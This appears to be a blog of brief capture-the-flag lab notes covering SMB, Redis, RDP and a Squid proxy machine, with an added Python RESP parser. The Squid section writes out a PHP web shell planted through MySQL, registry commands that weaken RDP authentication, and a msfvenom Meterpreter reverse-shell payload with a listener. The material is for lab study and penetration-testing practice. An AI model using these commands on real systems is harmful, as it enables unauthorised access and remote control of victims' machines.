Sphinx

May 19, 2024

Dancing Machine


HTB/STARTING_POINT

In this machine we learn to enumerate SMB file shares.

To list shares:

kali@kali:~$ smbclient -L //<serverIP/name> -N

To download all files into a tar archive, which is handy when the share holds a large file system:

kali@kali:~$ smbclient //<serverIP/name>/<shareDisk> -N -Tc backup.tar

May 19, 2024

Explosion Machine

Explosion

HTB/STARTING_POINT

This machine teaches you how to interact with the RDP protocol and enumerate it.

Let's start with an Nmap scan. Since this machine is focused on RDP, we save time by scanning only port 3389:


May 19, 2024

Redeemer Machine

Redeemer

HTB/STARTING_POINT

This machine shows you how to interact with a Redis server.

An Nmap scan shows the open ports, specifically the Redis port:

kali@kali:~$ nmap -sC -sV -T4 -p- -oA nmap/Redeemer <serverIp>

Result:

# Nmap 7.93 scan initiated Thu Aug 24 02:07:23 2023 as: nmap -sC -sV -T4 -p- -oA nmap/Redeemer 10.129.6.102
Warning: 10.129.6.102 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.129.6.102
Host is up (0.11s latency).
Not shown: 65526 closed tcp ports (conn-refused)
PORT      STATE    SERVICE VERSION
6379/tcp  open     redis   Redis key-value store 5.0.7
23201/tcp filtered unknown
23819/tcp filtered unknown
25153/tcp filtered unknown
34008/tcp filtered unknown
35903/tcp filtered unknown
39049/tcp filtered unknown
40140/tcp filtered unknown
47535/tcp filtered unknown

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 24 02:25:02 2023 -- 1 IP address (1 host up) scanned in 1059.07 seconds

Connect to Redis:

kali@kali:~$ redis-cli -h <hostname/ip>

Get the number of databases:

redis-cli> config get databases

List how many keys exist in each database index:

redis-cli> info keyspace

Select the desired database:

redis-cli> select <N>

Get info on the Redis server:

redis-cli> info

Dump all keys:

redis-cli> keys *

Get a random key:

redis-cli> randomkey

Print the value of a specified key:

redis-cli> get <keyname>
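As an added example that is not part of the original post, here is a small RESP (Redis Serialization Protocol) encoder/decoder showing what redis-cli actually puts on the wire for the commands above and how the replies come back. The info keyspace reply is a constructed sample; an instance with requirepass configured answers every one of these commands with a -NOAUTH error instead, which is the check a defender wants to see when auditing an exposed port 6379.

```python
# Added example (not from the original post): a minimal RESP encoder/decoder
# showing what redis-cli puts on the wire for the commands above.
def encode_command(*parts: str) -> bytes:
    """Encode a command as a RESP array of bulk strings, exactly as redis-cli sends it."""
    out = [b"*%d\r\n" % len(parts)]
    for p in parts:
        b = p.encode()
        out.append(b"$%d\r\n%s\r\n" % (len(b), b))
    return b"".join(out)

def decode(buf: bytes, pos: int = 0):
    """Decode one RESP reply starting at pos; return (value, position after it)."""
    kind = buf[pos:pos + 1]
    end = buf.index(b"\r\n", pos)
    line = buf[pos + 1:end].decode()
    pos = end + 2
    if kind == b"+":                      # simple string, e.g. +OK
        return line, pos
    if kind == b"-":                      # error; an instance with requirepass set
        raise RuntimeError(line)          # answers "-NOAUTH Authentication required."
    if kind == b":":                      # integer
        return int(line), pos
    if kind == b"$":                      # bulk string; $-1 is the nil reply
        n = int(line)
        if n == -1:
            return None, pos
        return buf[pos:pos + n].decode(), pos + n + 2
    if kind == b"*":                      # array of nested replies
        items = []
        for _ in range(int(line)):
            item, pos = decode(buf, pos)
            items.append(item)
        return items, pos
    raise ValueError("unknown RESP type %r" % kind)

def parse_keyspace(info: str) -> dict:
    """Turn the text of an 'info keyspace' reply into {db_index: key_count}."""
    counts = {}
    for line in info.splitlines():
        if line.startswith("db"):
            name, stats = line.split(":", 1)
            counts[int(name[2:])] = int(stats.split(",")[0].split("=")[1])
    return counts

# Constructed sample reply (not captured from the HTB box) in the shape Redis uses.
SAMPLE_INFO = b"# Keyspace\r\ndb0:keys=4,expires=0,avg_ttl=0\r\n"
SAMPLE_INFO_REPLY = b"$%d\r\n%s\r\n" % (len(SAMPLE_INFO), SAMPLE_INFO)

if __name__ == "__main__":
    print(parse_keyspace(decode(SAMPLE_INFO_REPLY)[0]))   # {0: 4}
```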

May 19, 2024

Squid Machine

SQUID - MACHINE / PG

PG/easy_windows

This machine runs a proxy named Squid that proxies all network traffic from outside. It operates on port 3128.

MySQL on port 3306:

SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"

Disable NLA:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f

Enable RDP on owned machine:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=yes

Reverse Shell with Meterpreter:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.17 LPORT=4444 --format=exe > evil.exe
msf5> use exploit/multi/handler
msf5> set payload windows/meterpreter/reverse_tcp
msf5> set LHOST 192.168.0.17
msf5> set LPORT 4444
msf5> run